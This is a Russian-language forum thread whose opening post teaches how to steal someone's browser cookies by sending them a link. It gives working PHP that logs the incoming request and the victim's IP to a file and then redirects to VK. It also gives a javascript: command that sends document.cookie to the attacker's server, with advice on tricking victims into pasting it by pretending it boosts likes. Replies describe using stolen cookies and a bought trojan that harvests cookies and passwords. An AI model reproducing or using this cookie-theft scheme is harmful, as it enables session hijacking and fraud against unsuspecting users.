Получаем куки

[bastiang19]

Данная схема не придумана лично мной, но формулировка моя.-.
На форуме не нашел ничего подобного, поэтому почему бы и нет​

Сегодня я расскажу как можно получить куки человека удалённо, всего лишь отправив ссылку.

Итак, поехали.
1.Первое, что нам нужно - это хостинг/сервер. Если вы не планируете заниматься этим на постоянной основе, то вполне подойдет и обычный фри хостинг.

2.Заходим в файловый менеджер, и создаём папку.(в моём примере я назову её "kek")

3. Меняем права папки на 777, то есть ставим везде галочки

4. Создаем в папке документ index.php

И вставляем в него этот код:

<?php

//получаем данные с ссылки

$cookie = $_SERVER['REQUEST_URI'];

//ip адрес

$ip = $_SERVER['REMOTE_ADDR'];

//Создаём файл

$file = fopen("snif.dat","a+");

//вычисляем текущее время

$time = date("H:i:M:d");

//добавляем в строковую переменную куки + время + ip

$add_text = "$ip $time $cookie";

//записываем данные в файл

fputs($file,$add_text.",\r\n");

//закрываем файл

fclose($file);

//что бы не спалили переносим пользователя обратно в вк

header('Location:https://vk.com');

?>

5. Вы можете поменять редирект(последняя строчка). Но это уже зависит от того, где вы будете распростронять скрипт)
То есть вот ссылка :
ваш_домен.ru/kek/index.php

6. Записываем себе в блокнот данный скрипт:
java script:window.location.href = "http://ваш_домен.ru/kek/index.php?cookie="+document.cookie;

(!!!ВАЖНО!!! Когда вставите скрипт в адресную строку, то уберите пробел между java и script.)

Теперь большая часть сделана. Осталось втереть жертве, чтоб она вставила скрипт в адресную строку. Например скажите, что это скрипт на накрутку друзей, лайков, хромосом и тд.
Тут уже сами думайте)

Когда жертва вставит скрипт, она будет перенаправлена на главную страницу вк, и даже ничего не заподозрит. А тем временем в вашей папке kek появится документ "snif.dat" в котором собственно и будут находиться куки. Останется только вставить их себе в браузер.

К слову, в ВК авторизоваться при помощи только куки уже давно нельзя.-.

 

[flofloflo]

если быть с жертвой в одной вайфай сети то по идее можно по кукам зайти. Ну точно должно работать если с одной файфай сети и жертва ранее заходила с вашего устройства к себе в вк.

 

[XeuTep_BY]

К слову, в ВК авторизоваться при помощи только куки уже давно нельзя.-.

Я в этом не силен. Но купленый троян присылает мне куки жертвы. Эти куки вставляю в расширение (скачаное из магазина) для гугл хрома. И все у меня работает авторизовывает и в вк и в баду и других защищенных сайтов

 

[XeuTep_BY]

Это не куки, это токен.
Это разные вещи. Чисто по кукам ты не зайдешь, есть такая штука как фингерпринт.

Конкретно куки. В формате jso + файл с логинами и паролями от сайтов